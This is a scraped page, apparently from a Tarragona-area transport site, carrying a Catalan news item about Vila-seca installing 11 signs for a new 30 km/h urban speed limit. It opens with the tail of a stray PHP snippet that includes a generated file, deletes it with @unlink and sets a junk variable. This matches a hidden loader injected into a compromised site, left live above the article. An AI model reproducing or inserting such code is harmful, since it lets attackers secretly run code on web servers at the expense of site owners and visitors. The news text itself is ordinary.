");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Instal·lada la nova senyalització vertical a Vila-seca, que limita la velocitat a 30 km/h
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Instal·lada la nova senyalització vertical a Vila-seca, que limita la velocitat a 30 km/h (29/04/2021)

Vila-seca ha finalitzat la instaŀlació de la senyalització vertical que indica la nova velocitat màxima de 30 km/h en zones urbanes. D'aquesta manera, Vila-seca s'ha avançat a la nova normativa de circulació que entrarà en vigor a mitjans del proper mes de maig a tot el país i que té en compte la recent irrupció dels vehicles de mobilitat personal com ara els patinets elèctrics.

Concretament al municipi, s'han instaŀlat un total d'11 senyals de límit 30 km/h a les entrades de la població: 6 a Vila-seca, 2 a la Pineda i 3 a la Plana.

A nivell general, el límit a 30 km/h serà d'aplicació en tots els carrers d'un sentit o un carril per sentit, tot i que la velocitat encara es veurà més reduïda (fins als 20 km/h) a les vies de plataforma única i no variarà (50 km/h) en les vies de dos carrils o més per sentit.

Cal destacar que, a Vila-seca, aquests senyals informatius estan dissenyats i tematitzats amb elements singulars de cadascun dels tres nuclis urbans: Vila-seca, la Pineda i la Plana.

Font: Ajuntament de Vila-seca

Instal·lada la nova senyalització vertical a Vila-seca, que limita la velocitat a 30 km/h

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona